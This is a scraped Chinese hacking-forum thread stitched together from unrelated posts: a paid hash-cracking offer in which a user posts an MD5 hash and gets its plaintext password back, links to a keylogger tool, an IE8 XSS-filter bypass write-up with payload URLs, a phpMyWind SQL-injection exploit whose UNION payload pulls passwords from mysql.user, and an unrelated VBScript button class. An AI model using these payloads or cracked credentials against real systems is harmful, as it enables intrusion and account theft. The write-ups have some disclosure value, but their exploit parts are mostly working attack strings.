最近看过此主题的会员

返回列表 发帖

限时免费查询cmd5.com收费记录

限时免费查询cmd5.com收费记录
        
       end date:未定

   

  不定期发放福利。

 

您可能还想看的主题:

空间刷流量软件,不记录ip类型

NS 周年纪念版(本地生成,含键盘记录,兼容教师节版)

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

不错,准确率挺高的!

TOP

附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

TOP

赞一个
  
求秒        15fd475a7b2cd5aab089edbc91a2e68b

TOP

回复 4# 0x01


15fd475a7b2cd5aab089edbc91a2e68b


查询结果:  
ahin10180234

TOP

回复 5# 無情


    thx、、、·

TOP

厉害,批量破解快么?

TOP

支持支持楼主
黑客技術學的再好,卻無法入侵你的心,服務器入侵的再多,對你只有GUEST,是你過分的完美,還是我太菜!!

TOP

好吧都过期了!

TOP

回复 9# webmaster


暂时可以继续查。。

TOP

IE8安全警告问题

漏洞说明:IE8是微软新推出的一款浏览器,其对CSS2.1的完整支持,HTML5的支持,内置开发工具等等。IE8在浏览器安全性上有非常大的改进,内置了一款无法卸载的Xss Filter,对非持久型跨站脚本攻击做了比较好的防护。但是80sec在测试IE8时,发现IE8在设计Xss Filter时存在逻辑上的错误,可能导致一些原本不存在漏洞的站点出现安全问题,并且IE8也并没有从根本上解决跨站脚本攻击问题,甚至针对非持久型跨站脚本攻击在变通攻击方法之后一样可能被利用。而在一些书写不严谨的web站点上,IE8的Xss Filter根本发挥不了任何作用。
漏洞站点:http://www.microsoft.com/<BR><BR>漏洞解析:通过我们研究后发现IE8的Xss Filter的基本原理是根据一些已知的攻击情况所集成的规则库来匹配书写的URL,如果匹配规则就发出警告,并且将站点回显的页面里的相关匹配内容替换成无危害的类型。这一过程存在很多问题
1 匹配的规则问题
IE8只能对一些已知的简单规则进行匹配,并且不能防止JavaScript Injection和一些Dom操作带来的XSS,对于持久型Xss更是无能为力。所以IE8在防止Xss方面只是做了非常非常小的一部。这一步对于一些书写不严谨的站点更是起不了任何作用。譬如一个Dom Xss[Thanks Luoluo]
Dom XSS In IE8
可以看到XSS一样触发。
2 如何在IE8下进行非持久XSS[该问题受同源策略影响]
IE8只是给人一种安全感,他并不能修复站点的安全漏洞。对于黑客来讲,他只需要把原来的XSS放到iframe里就一样可以用来攻击该站点,并不能从根本上解决跨站。譬如原来是
http://www.80sec.com/?url=&lt;script&gt;alert()&lt;/script&gt;
会被拦截,但是当你用
&lt;iframe src=’http://www.80sec.com/?url=&lt;script&gt;alert()&lt;/script&gt;’&gt;&lt;/iframe&gt;
一样可以利用,不过可能需要一些更深入的技巧。
3 IE8使很多的站点存在安全隐患
IE8的防护设计是当有违反规则的输入在URL里时,就把页面相应的内容给替换掉,而不管这个页面的内容是不是由用户输入造成的。黑客利用这一点,可以替换目标站点的某些代码,而实现这个只需要在地址后面加一个无关紧要的输入。如果被替换的内容涉及到一些页面逻辑,就可能被上下文利用,使用IE8的话,任何站点都可能成为攻击目标。
http://www.baidu.com/?80sec=&lt;meta%20http-equiv=Content-Type%20content=”text/html;charset=gb2312″&gt;
看看,在IE8下上面URL是不是乱了,当然,我们可以利用这个特性注释掉很多东西,如JS等等,都可以导致目标站点存在安全隐患,甚至被利用。
4. IE8的Xss Filter功能具有同源策略特性。
IE8的Xss Filter功能具有同源策略特性,相对于大部分非持久型XSS,如果攻击点来源于被攻击网站,将不会对XSS情况进行拦截。说明IE8的Xss Filter功能在设计时,决定完全信任来自本域的访问,例如
http://www.baidu.com/?xss=&lt;script&gt;alert(’xss’)
这类链接如果出现在www.baidu.com域内的页面被点击触发XSS漏洞,IE8的Xss Filter将不会拦截。
漏洞状态:等候官方回应


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

phpMyWind注入绕过知道创宇补丁
改完ID后第一次发帖,本来是说改个东邪,和西毒一起搞基的,谁知这货居然消失了,╮(╯▽╰)╭。
最近看知道创宇在微博上各种转发这个漏洞,就跑去T00Ls看了下,谁知看着看着,看到了另一个注入点,这尼玛人品也太好了O(∩_∩)O。
这个漏洞暂时我还想先玩一阵,所以各位先不要发到外面。
废话不多说了,看正文吧。
0x01 漏洞原理


漏洞在shoppingcart.php文件大约152行处:


<?php
  
                //初始化参数
                $totalprice = '';
                $shoppingcart = unserialize(AuthCode($_COOKIE['shoppingcart']));
  
                //显示订单列表
                foreach($shoppingcart as $k=>$goods)
                {
                ?>
                <tr>
                        <td height="30">
                        <?php
  
                        //获取数据库中商品信息
                        $r = $dosql->GetOne("SELECT * FROM `#@__goods` WHERE `id`=".$goods[0]);
//省略部分代码
可以从代码开始部分看到,$goods变量是从cookie中取出的shoppingcart字段值直接反序列化后的内容,没有进行任何的过滤和校验。
0x02 利用分析
我们先来整理下我们目前所获得的信息,我们可以通过控制cookie中的shoppingcart字段值来向代码中传入自定义内容,这部分内容是一个数组,并且第一个元素会没有经过任何校验和过滤带入到SQL查询中。
但是cookie中的这个字段会进行AuthCode的解码处理,这个处理需要用到服务端所使用到的key,这是我们无法获得的,所以我们需要找一个地方将我们所自定义的内容继续进行AuthCode的编码处理。我是怎么找到这个地方的呢?且听我慢慢到来。
这个漏洞是在看T00ls社区M3loee所公布的《T00ls元旦献礼之一:PhpMyWind SQL Injection 0day》时发现的。所以我们先来看下这个漏洞出现问题的分支部分代码:


if($a == 'addshopingcart')
{
  
         //省略部分代码
         
        //初始化购物车字符串
        if(!empty($_COOKIE['shoppingcart']))
                $shoppingcart = unserialize(AuthCode($_COOKIE['shoppingcart']));
        else
                $shoppingcart = array();
  
  
        //选中信息存入数组
        if(isset($goodsid) &amp;&amp;
           isset($buynum) &amp;&amp;
           isset($goodsattr))
        {
                $shoppingcart[] = array($goodsid, $buynum, $goodsattr);
        }
  
  
        //存入COOKIE
        setcookie('shoppingcart', AuthCode(serialize($shoppingcart),'ENCODE'));
        echo TRUE;
        exit();
}//省略部分代码
看到setcookie那行,就是对$shoppingcart变量内容进行序列化并发送至cookie。而phpMyWind的参数传递风格是使用for循环将GET和POST参数进行变量化的,就像DeDecms一样。这样的话,$goodsid、$buynum和$goodsattr三个变量的内容是可以控制的。再看$shoppingcart变量的赋值,可以发现之前那段代码中的goods[0]就是这里的$goodsid。
到这里我们重新整理下思路,在addshopingcart这个分支中,通过提交goodsid参数向$shoppingcart[0]中赋值,然后$shoppingcart被序列化发送到客户端。客户端再次访问这个页面,并发送刚刚得到的cookie,服务端将shoppingcart的值进行发序列化,并将数组中第一个元素的值带入到SQL查询中。
这样如果我们向goodsid中传递带有恶意查询的内容,就会造成SQL注入问题。并且我们还在后面的页面输出中发现这样一行代码:




echo '<a href="goodsshow.php?cid='.$r['classid'].'&amp;tid='.$r['typeid'].'&amp;id='.$r['id'].'" class="title" target="_blank">'.$r['title'].'</a>';
也就是说我们可以将注入结果放置到title这个字段中,就可以直接获取SQL查询的回显了,不再需要报错或者盲注了。
0x03 漏洞重现
首先访问




http://www.sitedirsec.com/shoppingcart.php?a=addshopingcart&amp;goodsid=1 and @`'` /*!50000union*/ select null,null,null,null,null,null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from mysql.user where 1=1 or @`'`&amp;buynum=1&amp;goodsattr=tpcs
然后访问


http://www.sitedirsec.com/phpmywind4.6.6/shoppingcart.php
,获取注入信息


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

利用vbs类实现css按钮
<%rem 文章标题: 利用vbs类实现css按钮rem 作者:yanekrem 联系:aspboy@263.net
Class CssButton
  Public Name  Public BackColor  Public BorderColor  Public Font  Public FontColor  Public Width  Public Text  Public Url
  Public MouseOverColor
      Public Function GenerateStyleTag()    'Create the STYLE tag    Dim strStyle    strStyle =     "<STYLE TYPE=""text/css"">" &amp; vbCrLf &amp; _                   "<!--" &amp; vbCrLf &amp; _                   "#mybutton" &amp; Name &amp; "   {border-style: inset; " &amp; vbCrLf &amp; _                   "             border-color: " &amp; BorderColor &amp; ";" &amp; vbCrLf &amp; _                   "             background-color: " &amp; BackColor &amp; ";" &amp; vbCrLf &amp; _                   "             width: " &amp; Width &amp; ";" &amp; vbCrLf &amp; _                   "             text-align: center; }" &amp; vbCrLf &amp; vbCrLf &amp; vbCrLf &amp; _                   "A.buttontext" &amp; Name &amp; " {color: " &amp; FontColor &amp; "; " &amp; vbCrLf &amp; _                   "              text-decoration: none; " &amp; vbCrLf &amp; _                   "              font: " &amp; Font &amp; ";" &amp; vbCrLf &amp; _                   "              cursor: hand; }" &amp; vbCrLf &amp; vbCrLf &amp; vbCrLf &amp; _                   ".buttonover" &amp; Name &amp; " {color: " &amp; MouseOverColor &amp; ";" &amp; vbCrLf &amp; _                   "             text-decoration: none; " &amp; vbCrLf &amp; _                   "             font: " &amp; Font &amp; ";" &amp; vbCrLf &amp; _                   "             cursor: hand; }" &amp; vbCrLf &amp; _                   " // -->" &amp; vbCrLf &amp; _                   "</STYLE>"
    GenerateStyleTag = strStyle  End Function
  Public Function GenerateButtonTag()    Dim strHTML    strHTML = "<a href=""" &amp; Url &amp; """ class=""buttontext" &amp; Name &amp; """ " &amp; _              "onMouseOver=""this.className='buttonover" &amp; Name &amp; "';"" " &amp; _              "onMouseOut=""this.className='buttontext" &amp; Name &amp; "';"">" &amp; _              vbCrLf &amp; "<div id=""mybutton" &amp; Name &amp; """>" &amp; vbCrLf &amp; Text &amp; vbCrLf &amp; "</div></a>" &amp; vbCrLf
    GenerateButtonTag = strHTML  End Function
End Class
rem 建立类的实例
Dim btnYahoo, btnLycosSet btnYahoo = New CssButtonSet btnLycos = New CssButton
rem 设置按钮对象的相关属性
btnYahoo.BackColor = "#aaaaaa"btnYahoo.BorderColor = "#bbbbbb"btnYahoo.Font = "bold 12pt Verdana"btnYahoo.FontColor = "black"btnYahoo.Width = "80px"btnYahoo.MouseOverColor = "yellow"btnYahoo.Url = "http://www.yahoo.com/"btnYahoo.Name = "yahoo"btnYahoo.Text = "Yahoo!"
rem 调用方法输出按钮Response.Write btnYahoo.GenerateStyleTag()Response.Write btnYahoo.GenerateButtonTag()Response.Write "<p> </p>"
rem 设置按钮对象的相关属性btnLycos.BackColor = "#aaaaaa"btnLycos.BorderColor = "#bbbbbb"btnLycos.Font = "10pt Arial"btnLycos.FontColor = "black"btnLycos.Width = "70px"btnLycos.MouseOverColor = "yellow"btnLycos.Url = "http://www.lycos.com/"btnLycos.Name = "lycos"btnLycos.Text = "Lycos"
rem 调用方法输出按钮Response.Write btnLycos.GenerateStyleTag()Response.Write btnLycos.GenerateButtonTag()%>
演示:http://www.cnaspol.com/vbsclasscssbutton.asp


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表